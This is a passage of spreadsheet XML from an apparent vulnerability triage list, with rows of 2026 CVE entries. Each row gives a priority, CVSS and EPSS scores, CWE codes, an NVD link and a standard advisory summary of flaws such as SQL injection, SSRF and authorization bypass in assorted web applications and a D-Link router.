          <t>A vulnerability was found in openagents-org openagents up to 0.8.19/0.9.3.post20. Impacted is the function test_default_model of the file sdk/src/openagents/sdk/transports/http.py. Performing a manipulation of the argument base_url results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. Endpoint and both sinks unchanged since filing; only the file moved (e277dd1a). Maintainer closed as inapplicable yet the identical unguarded code still ships in 0.9.3.post20. Sibling admin endpoints do call the shipped-but-unused-by-this-handler _require_admin().</t>
        </is>
      </c>
      <c r="M4764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86237</t>
        </is>
      </c>
    </row>
    <row r="4765">
      <c r="A4765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86239</t>
        </is>
      </c>
      <c r="C4765" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4765" s="5" t="inlineStr"/>
      <c r="F4765" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4765" s="5" t="inlineStr"/>
      <c r="H4765" s="5" t="inlineStr"/>
      <c r="I4765" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4765" s="5" t="inlineStr"/>
      <c r="K4765" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="L4765" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in liufee FeehiCMS up to 2.1.1. The impacted element is the function UeditorAction::init of the file backend/widgets/ueditor/UeditorAction.php of the component UEditor Widget. The manipulation leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86239</t>
        </is>
      </c>
    </row>
    <row r="4766">
      <c r="A4766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86260</t>
        </is>
      </c>
      <c r="C4766" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4766" s="5" t="inlineStr"/>
      <c r="F4766" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4766" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4766" s="5" t="inlineStr"/>
      <c r="I4766" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4766" s="5" t="inlineStr"/>
      <c r="K4766" s="5" t="inlineStr">
        <is>
          <t>CWE-620, CWE-640</t>
        </is>
      </c>
      <c r="L4766" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. The affected element is the function modifyPassWord of the file ssm_pro/src/main/java/cn/sfturing/web/CommonUserController.java of the component Password Recovery. Performing a manipulation results in unverified password change. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86260</t>
        </is>
      </c>
    </row>
    <row r="4767">
      <c r="A4767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86261</t>
        </is>
      </c>
      <c r="C4767" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4767" s="5" t="inlineStr"/>
      <c r="F4767" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4767" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4767" s="5" t="inlineStr"/>
      <c r="I4767" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4767" s="5" t="inlineStr"/>
      <c r="K4767" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4767" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. The impacted element is an unknown function of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Controller. Executing a manipulation of the argument userIdenf can lead to authorization bypass. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86261</t>
        </is>
      </c>
    </row>
    <row r="4768">
      <c r="A4768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86262</t>
        </is>
      </c>
      <c r="C4768" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4768" s="5" t="inlineStr"/>
      <c r="F4768" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4768" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4768" s="5" t="inlineStr"/>
      <c r="I4768" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4768" s="5" t="inlineStr"/>
      <c r="K4768" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4768" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. This affects the function updateOrderSta1/updateOrderdiseaseInfo of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Handler. The manipulation of the argument userID/id leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86262</t>
        </is>
      </c>
    </row>
    <row r="4769">
      <c r="A4769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86263</t>
        </is>
      </c>
      <c r="C4769" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4769" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4769" s="5" t="inlineStr"/>
      <c r="F4769" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4769" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4769" s="5" t="inlineStr"/>
      <c r="I4769" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4769" s="5" t="inlineStr"/>
      <c r="K4769" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4769" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. This impacts the function orderRecordsService.cancelOrder of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Cancellation. The manipulation of the argument ID results in authorization bypass. The attack may be performed from remote. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86263</t>
        </is>
      </c>
    </row>
    <row r="4770">
      <c r="A4770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86268</t>
        </is>
      </c>
      <c r="C4770" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4770" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4770" s="5" t="inlineStr"/>
      <c r="F4770" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4770" s="5" t="inlineStr"/>
      <c r="H4770" s="5" t="inlineStr"/>
      <c r="I4770" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4770" s="5" t="inlineStr"/>
      <c r="K4770" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4770" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode School Management System 1.0. Impacted is an unknown function of the file User_Login.php. The manipulation of the argument email results in sql injection. The attack can be executed remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M4770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86268</t>
        </is>
      </c>
    </row>
    <row r="4771">
      <c r="A4771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86272</t>
        </is>
      </c>
      <c r="C4771" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4771" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4771" s="5" t="inlineStr"/>
      <c r="F4771" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4771" s="5" t="inlineStr"/>
      <c r="H4771" s="5" t="inlineStr"/>
      <c r="I4771" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4771" s="5" t="inlineStr"/>
      <c r="K4771" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="L4771" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Beijing Meite Software Technology U+Smart Enjoyment WebSite 18.6001.1096.1000. This impacts an unknown function of the file /Report/Upload/UploadFormImg.ashx. Executing a manipulation of the argument File can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M4771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86272</t>
        </is>
      </c>
    </row>
    <row r="4772">
      <c r="A4772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86273</t>
        </is>
      </c>
      <c r="C4772" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4772" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4772" s="5" t="inlineStr"/>
      <c r="F4772" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4772" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4772" s="5" t="inlineStr"/>
      <c r="I4772" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4772" s="5" t="inlineStr"/>
      <c r="K4772" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4772" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in projeto-siga siga up to 11.1.1. Affected by this issue is the function DownloadExterno.getUrl of the file sigaex/src/main/java/br/gov/jfrj/siga/vraptor/ExUtilController.java of the component HTML-to-PDF Endpoint. This manipulation of the argument html causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86273</t>
        </is>
      </c>
    </row>
    <row r="4773">
      <c r="A4773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86274</t>
        </is>
      </c>
      <c r="C4773" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4773" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4773" s="5" t="inlineStr"/>
      <c r="F4773" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4773" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4773" s="5" t="inlineStr"/>
      <c r="I4773" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4773" s="5" t="inlineStr"/>
      <c r="K4773" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L4773" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in projeto-siga siga up to 11.0.2.10/11.0.2.13/11.1.1. This affects the function ExAutenticacaoController.autenticar of the file sigaex/src/main/java/br/gov/jfrj/siga/vraptor/ExAutenticacaoController.java of the component Authentication Flow. Such manipulation of the argument cod/jwt leads to missing authorization. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86274</t>
        </is>
      </c>
    </row>
    <row r="4774">
      <c r="A4774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86275</t>
        </is>
      </c>
      <c r="C4774" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4774" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4774" s="5" t="inlineStr"/>
      <c r="F4774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4774" s="5" t="inlineStr"/>
      <c r="H4774" s="5" t="inlineStr"/>
      <c r="I4774" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4774" s="5" t="inlineStr"/>
      <c r="K4774" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L4774" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This vulnerability affects the function register of the file auth.php. Performing a manipulation of the argument role results in improper privilege management. Remote exploitation of the attack is possible. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M4774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86275</t>
        </is>
      </c>
    </row>
    <row r="4775">
      <c r="A4775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86276</t>
        </is>
      </c>
      <c r="C4775" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4775" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4775" s="5" t="inlineStr"/>
      <c r="F4775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4775" s="5" t="inlineStr"/>
      <c r="H4775" s="5" t="inlineStr"/>
      <c r="I4775" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4775" s="5" t="inlineStr"/>
      <c r="K4775" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="L4775" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This issue affects some unknown processing of the file db.php. Executing a manipulation can lead to hard-coded credentials. The attack can be executed remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86276</t>
        </is>
      </c>
    </row>
    <row r="4776">
      <c r="A4776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86277</t>
        </is>
      </c>
      <c r="C4776" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4776" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4776" s="5" t="inlineStr"/>
      <c r="F4776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4776" s="5" t="inlineStr"/>
      <c r="H4776" s="5" t="inlineStr"/>
      <c r="I4776" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4776" s="5" t="inlineStr"/>
      <c r="K4776" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4776" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. Impacted is an unknown function of the file delete_exam.php. The manipulation of the argument ID leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M4776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86277</t>
        </is>
      </c>
    </row>
    <row r="4777">
      <c r="A4777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86280</t>
        </is>
      </c>
      <c r="C4777" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4777" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4777" s="5" t="inlineStr"/>
      <c r="F4777" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4777" s="5" t="inlineStr"/>
      <c r="H4777" s="5" t="inlineStr"/>
      <c r="I4777" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4777" s="5" t="inlineStr"/>
      <c r="K4777" s="5" t="inlineStr">
        <is>
          <t>CWE-310, CWE-312</t>
        </is>
      </c>
      <c r="L4777" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This affects an unknown function of the file cict_portal.sql. Such manipulation leads to cleartext storage of sensitive information. It is possible to launch the attack remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M4777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86280</t>
        </is>
      </c>
    </row>
    <row r="4778">
      <c r="A4778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86282</t>
        </is>
      </c>
      <c r="C4778" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4778" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4778" s="5" t="inlineStr"/>
      <c r="F4778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4778" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4778" s="5" t="inlineStr"/>
      <c r="I4778" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4778" s="5" t="inlineStr"/>
      <c r="K4778" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4778" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in jaychouchannel Tourism-Management-System up to 8122bf020d91199eddfff3ee02d1632a70a9a132. Affected is an unknown function of the file travel/src/main/java/com/controller/CommonController.java of the component CommonDao. Executing a manipulation of the argument table/column/xColumn/yColumn can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. This patch is called d44ec3aa0bd2a72c8800e3befb0a9a96a6491b86. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="M4778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86282</t>
        </is>
      </c>
    </row>
    <row r="4779">
      <c r="A4779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86284</t>
        </is>
      </c>
      <c r="C4779" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4779" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4779" s="5" t="inlineStr"/>
      <c r="F4779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4779" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4779" s="5" t="inlineStr"/>
      <c r="I4779" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4779" s="5" t="inlineStr"/>
      <c r="K4779" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4779" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in jaychouchannel Tourism-Management-System up to 8122bf020d91199eddfff3ee02d1632a70a9a132. Affected by this vulnerability is the function getOption of the file travel/src/main/java/com/controller/CommonController.java. The manipulation of the argument tableName/columnName leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The identifier of the patch is d44ec3aa0bd2a72c8800e3befb0a9a96a6491b86. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="M4779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86284</t>
        </is>
      </c>
    </row>
    <row r="4780">
      <c r="A4780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86290</t>
        </is>
      </c>
      <c r="C4780" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4780" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4780" s="5" t="inlineStr"/>
      <c r="F4780" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4780" s="5" t="inlineStr"/>
      <c r="H4780" s="5" t="inlineStr"/>
      <c r="I4780" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4780" s="5" t="inlineStr"/>
      <c r="K4780" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4780" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in SourceCodester Online Voting System 1.0. This affects an unknown function of the file /voting/ajax.php?action=save_category. This manipulation of the argument Category causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="M4780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86290</t>
        </is>
      </c>
    </row>
    <row r="4781">
      <c r="A4781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86292</t>
        </is>
      </c>
      <c r="C4781" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4781" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4781" s="5" t="inlineStr"/>
      <c r="F4781" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4781" s="5" t="inlineStr"/>
      <c r="H4781" s="5" t="inlineStr"/>
      <c r="I4781" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4781" s="5" t="inlineStr"/>
      <c r="K4781" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4781" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Simple Traffic Offense System 1.0. Affected is an unknown function of the file saveuser.php of the component User Creation. Performing a manipulation of the argument position results in missing authentication. The attack may be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M4781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86292</t>
        </is>
      </c>
    </row>
    <row r="4782">
      <c r="A4782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86293</t>
        </is>
      </c>
      <c r="C4782" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4782" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4782" s="5" t="inlineStr"/>
      <c r="F4782" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4782" s="5" t="inlineStr"/>
      <c r="H4782" s="5" t="inlineStr"/>
      <c r="I4782" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4782" s="5" t="inlineStr"/>
      <c r="K4782" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4782" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Simple Traffic Offense System 1.0. Affected by this vulnerability is an unknown functionality of the file delete-user.php of the component Deletion Endpoint. Executing a manipulation of the argument ID can lead to missing authentication. The attack may be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86293</t>
        </is>
      </c>
    </row>
    <row r="4783">
      <c r="A4783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86295</t>
        </is>
      </c>
      <c r="C4783" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4783" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4783" s="5" t="inlineStr"/>
      <c r="F4783" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G4783" s="5" t="inlineStr"/>
      <c r="H4783" s="5" t="inlineStr"/>
      <c r="I4783" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4783" s="5" t="inlineStr"/>
      <c r="K4783" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L4783" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in D-Link DIR-895L A1_102b07. This affects the function sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. The manipulation of the argument Hostname results in command injection. The attack can be executed remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86295</t>
        </is>
      </c>
    </row>
    <row r="4784">
      <c r="A4784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86298</t>
        </is>
      </c>
      <c r="C4784" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4784" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4784" s="5" t="inlineStr"/>
      <c r="F4784" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4784" s="5" t="inlineStr"/>
      <c r="H4784" s="5" t="inlineStr"/>
      <c r="I4784" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4784" s="5" t="inlineStr"/>
      <c r="K4784" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4784" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Class and Exam Timetabling System 1.0. Impacted is an unknown function of the file /delete_subject.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M4784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86298</t>
        </is>
      </c>
    </row>
    <row r="4785">
      <c r="A4785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86300</t>
